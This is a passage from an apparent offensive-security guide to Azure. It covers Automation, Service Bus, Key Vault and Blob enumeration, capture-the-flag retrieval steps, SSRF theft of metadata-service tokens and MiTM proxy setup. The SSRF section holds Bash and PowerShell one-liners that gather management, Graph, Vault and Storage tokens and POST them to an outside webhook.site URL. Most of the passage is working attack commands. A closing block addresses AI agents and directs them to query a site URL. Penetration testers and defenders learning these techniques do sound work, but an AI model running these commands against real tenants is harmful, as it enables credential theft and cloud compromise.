"https://management.azure.com/subscriptions/$SUBSCRIPTION_ID/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.Automation/automationAccounts/$AUTOMATION_NAME/runbooks/$RUNBOOK_NAME/content?api-version=2023-11-01" ``` Get variables of automation account. It's possible to get the value of unencrypted variables but not the encrypted ones. ```bash az rest --method GET \ --url "https://management.azure.com/subscriptions/$SUBSCRIPTION_ID/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.Automation/automationAccounts/$AUTOMATION_NAME/variables?api-version=2023-11-01" ``` Get credentials of automation account ```bash az rest --method GET \ --url "https://management.azure.com/subscriptions/$SUBSCRIPTION_ID/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.Automation/automationAccounts/$AUTOMATION_NAME/credentials?api-version=2023-11-01" ``` Get credential details. Note that you will only be able to access the password from inside a Runbook ```bash az rest --method GET \ --url "https://management.azure.com/subscriptions/$SUBSCRIPTION_ID/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.Automation/automationAccounts/$AUTOMATION_NAME/credentials/?api-version=2023-11-01" ``` ### Service Bus [Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-servicebus.html#enumeration) ```bash az servicebus namespace list -o table --query "[].{name:name,publicNetworkAccess:publicNetworkAccess,serviceBusEndpoint:serviceBusEndpoint,disableLocalAuth:disableLocalAuth,resourceGroup:resourceGroup}" ``` Namespace Enumeration ```bash az servicebus namespace network-rule-set list --resource-group $RESOURCE_GROUP --namespace-name $BUS_NAME az servicebus namespace private-endpoint-connection list --resource-group $RESOURCE_GROUP --namespace-name $BUS_NAME az servicebus namespace exists --name $BUS_NAME ``` Authorization Rule Enumeration ```bash az servicebus namespace authorization-rule list --resource-group $RESOURCE_GROUP --namespace-name $BUS_NAME --query "[].{name:name,rights:rights}" az servicebus namespace authorization-rule keys list --resource-group $RESOURCE_GROUP --namespace-name $BUS_NAME ``` Queue Enumeration ```bash az servicebus queue list --resource-group $RESOURCE_GROUP --namespace-name $BUS_NAME ``` Topic Enumeration ```bash az servicebus topic list \ --resource-group $RESOURCE_GROUP \ --namespace-name $BUS_NAME \ --query "[].{TopicName:name, Status:status, ActiveMsgs:countDetails.activeMessageCount, DeadLetterMsgs:countDetails.deadLetterMessageCount, Partitioning:enablePartitioning}" \ --output table ``` Susbscription Enumeration ```bash az servicebus topic subscription list \ --resource-group $RESOURCE_GROUP \ --namespace-name $BUS_NAME \ --topic-name labtopic \ --query "[].{Subscription:name, Status:status, ActiveCount:countDetails.activeMessageCount, DeadLetterCount:countDetails.deadLetterMessageCount, RequiresSession:requiresSession}" \ --output table ``` ### Logic Apps [Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-logic-apps.html#enumeration) ### Virtual Desktop [Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#enumeration) ```bash az desktopvirtualization hostpool list --query "[].{Name:name, description:description, ResourceGroup:resourceGroup, Type:hostPoolType, LBType:loadBalancerType, MaxSessions:maxSessionLimit, AADJoin:customRdpProperty}" --output table ``` ### Monitoring Logs [Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-monitoring.html#enumeration) ## Get The Flag ### KeyVault ```bash KEYVAULT_NAME=$(az keyvault list --query "[0].name" -o tsv) SECRET_NAME=$(az keyvault secret list --vault-name "$KEYVAULT_NAME" --query "[0].name" -o tsv) az keyvault secret show --vault-name "$KEYVAULT_NAME" --name "$SECRET_NAME" ``` ### Blob ```bash STORAGE_ACCOUNT_NAME=$(az storage account list --resource-group iam-azure-labs --query "[0].name" -o tsv) az storage container list \ --account-name $STORAGE_ACCOUNT_NAME \ --auth-mode login az storage blob download \ --account-name $STORAGE_ACCOUNT_NAME \ --container-name flag \ --name flag.txt \ --file flag.txt \ --auth-mode login cat flag.txt ``` ## SSRF [More Azure SSRF Information](https://hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#azure-vm) ### Obtain tokens Manual ```bash HEADER="Metadata:true" URL="http://169.254.169.254/metadata" API_VERSION="2021-12-13" #https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service?tabs=linux#supported-api-versions echo "Instance details" curl -s -f -H "$HEADER" "$URL/instance?api-version=$API_VERSION" echo "Load Balancer details" curl -s -f -H "$HEADER" "$URL/loadbalancer?api-version=$API_VERSION" echo "Management Token" curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION&resource=https://management.azure.com/" echo "Graph token" curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION&resource=https://graph.microsoft.com/" echo "Vault token" curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION&resource=https://vault.azure.net/" echo "Storage token" curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION&resource=https://storage.azure.com/" ``` **Bash**: Exfiltrate all the tokens ```bash r="http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource="; h="Metadata:true"; json="{"; for res in "https://management.azure.com/" "https://graph.microsoft.com/" "https://vault.azure.net/" "https://storage.azure.com/"; do token=$(curl -s -f -H "$h" "${r}${res}" | sed -n 's/.*"access_token":"\([^"]*\)".*/\1/p'); json+="\"$res\":\"$token\","; done; json="${json%,}}"; curl -s -X POST -H "Content-Type: application/json" -d "$json" "https://webhook.site/9f90f8a5-2218-4da7-8810-4d9244530223" ``` **PowerShell**: Exfiltrate all the tokens ```powershell $h=@{Metadata='true'};$u='http://169.254.169.254/metadata/identity/oauth2/token';$v='2018-02-01';$r=@('https://management.azure.com/','https://graph.microsoft.com/','https://vault.azure.net/','https://storage.azure.com/');$tokens=@{};$r|%{$tokens[$_]=((Invoke-RestMethod -Uri "$u`?api-version=$v&resource=$_" -Headers $h -Method Get).access_token)};Invoke-WebRequest -Uri "https:///exfil" -Method POST -Body ($tokens|ConvertTo-Json) -ContentType 'application/json' ``` #### Azure App & Functions Services & Automation Accounts From the **env** you can get the values of **`IDENTITY_HEADER`** and **`IDENTITY_ENDPOINT`**. That you can use to gather a token to speak with the metadata server. ```bash TOKEN=$(wget -qO- --header "X-IDENTITY-HEADER: $IDENTITY_HEADER" "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&api-version=2019-08-01" | python3 -c 'import json,sys; print(json.load(sys.stdin)["access_token"])') ``` ### Bash Examples: **Curl** ```bash # Obtain a token ACCESS_TOKEN=$(curl -s -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" | jq -r .access_token) # Perform a request to the Azure API curl -s -X GET "https://management.azure.com/subscriptions/$SUBSCRIPTION_ID/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.Compute/virtualMachines/$VM_NAME?api-version=2023-03-01" -H "Authorization: Bearer $ACCESS_TOKEN" | jq .identity ``` **Wget** ```bash # Obtain a token TOKEN=$(wget -qO- --header "X-IDENTITY-HEADER: $IDENTITY_HEADER" "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&api-version=2019-08-01" | python3 -c 'import json,sys; print(json.load(sys.stdin)["access_token"])') wget -qO- --header "Authorization: Bearer $TOKEN" "https://$VAULT_NAME.vault.azure.net/secrets/$SECRET_NAME?api-version=2016-10-01" ``` ### PowerShell Examples ```powershell $armToken = Invoke-RestMethod ` -Headers @{Metadata="true"} ` -Method GET ` -Uri "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" # Verify the token was received echo $armToken.access_token # 1. Grab the subscription ID from the instance metadata $instanceInfo = Invoke-RestMethod -Headers @{Metadata="true"} -Method GET -Uri "http://169.254.169.254/metadata/instance?api-version=2021-02-01" $subId = $instanceInfo.compute.subscriptionId # 2. Define the ARM API endpoint for Key Vaults $uri = "https://management.azure.com/subscriptions/$subId/providers/Microsoft.KeyVault/vaults?api-version=2023-07-01" # 3. Query the endpoint $headers = @{Authorization = "Bearer $($armToken.access_token)"} $vaults = Invoke-RestMethod -Method GET -Headers $headers -Uri $uri # 4. Display the results cleanly $vaults.value | Select-Object name, resourceGroup, location $token = Invoke-RestMethod ` -Headers @{Metadata="true"} ` -Method GET ` -Uri "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://vault.azure.net" echo "ACCESS_TOKEN=$($token.access_token)" $secrets = Invoke-RestMethod -Method GET -Headers @{Authorization = "Bearer $($token.access_token)"} -Uri "https://$($vaults.value.name).vault.azure.net/secrets?api-version=7.4" $flagName = ($secrets.value | Where-Object { $_.id -match "flag" }).id echo "FLAG_URI=$($flagName)" (Invoke-RestMethod -Headers @{"Authorization"="Bearer $($token.access_token)"} -URI "$($flagName)?api-version=7.4").value | Out-String ``` ## MiTM ```bash wget http://127.0.0.1:8080/cert -O ~/Downloads/cacert.der openssl x509 -in ~/Downloads/cacert.der -inform DER -out ~/Downloads/cacert.pem -outform PEM export REQUESTS_CA_BUNDLE=/home/test/Downloads/cacert.pem export PYTHONWARNINGS="ignore:Unverified HTTPS request" export ADAL_PYTHON_SSL_NO_VERIFY=1 export AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1 export HTTPS_PROXY="http://127.0.0.1:8080" export HTTP_PROXY="http://127.0.0.1:8080" ``` ## Tools * [azure-cli-mitm](https://github.com/Marmeus/azure-cli-mitm): Proxy to intercept Azure CLI REST communications and append or modify `Authorization` Bearer tokens per Azure service domain. * [AzurePEAS](https://github.com/peass-ng/CloudPEASS): Enumerates the principals permissions within your Azure and Entra ID environments, with a special focus on detecting privilege escalation pathways and identifying potential security risks. * [CloudSploit](https://github.com/aquasecurity/cloudsploit): Open-source project designed to allow detection of security risks in cloud infrastructure accounts. * [Cloudfox](https://github.com/BishopFox/cloudfox): Helps you gain situational awareness in unfamiliar cloud environments. * [Azure CLI](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli?view=azure-cli-latest#install) * [Azure PowerShell AZ Module](https://learn.microsoft.com/en-us/powershell/azure/install-azure-powershell?view=azps-15.5.0) * [Microsoft Graph PowerShell](https://learn.microsoft.com/en-us/powershell/microsoftgraph/installation?view=graph-powershell-1.0) * [PowerShell In Linux](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-enumeration-tools.html#install-powershell-in-linux) * [Install the sqlcmd and bcp](https://learn.microsoft.com/en-us/sql/linux/sql-server-linux-setup-tools?view=sql-server-ver17\&tabs=ubuntu-install%2Codbc-ubuntu-2204#ubuntu) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://the-pentesting-guide.marmeus.com/situational_awareness/azure.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.